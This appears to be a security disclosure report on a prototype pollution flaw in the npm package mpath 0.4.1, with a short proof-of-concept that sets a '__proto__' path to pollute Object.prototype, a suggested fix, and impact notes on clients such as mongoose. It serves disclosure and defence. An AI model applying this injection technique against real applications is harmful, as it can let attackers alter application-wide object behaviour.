Prototype Pollution Vulnerability in mpath Package

I would like to report prototype pollution vulnerability in mpath. It allows an attacker to inject arbitrary properties on Object.prototype. # Module **module name:** mpath **version:** 0.4.1 **npm page:** `https://www.npmjs.com/package/mpath` ## Module Description {G,S}et javascript object values using MongoDB-like path notatio ## Module Stats 305,874 downloads in the last week # Vulnerability ## Vulnerability Description An attacker can specify a path that include the prototype object, and thus overwrite important properties on Object.prototype or add new ones. ## Steps To Reproduce: ```js var mpath = require("mpath"); var obj = { comments: [ { title: 'funny' }, { title: 'exciting!' } ] } mpath.set('__proto__.x', ['hilarious', 'fruity'], obj); console.log({}.x); ``` ## Patch N/A validate property names before overwriting them and prevent write to certain paths. # Wrap up - I contacted the maintainer to let them know: [N - I opened an issue in the related repository: N ## Impact This may be an intended behaviour of this module, but it needs to be better documented. Moreover, to properly analyse the impact of this vulnerability one must look at the clients of this module, such as mongoose and see if attackers can realistically control the path value.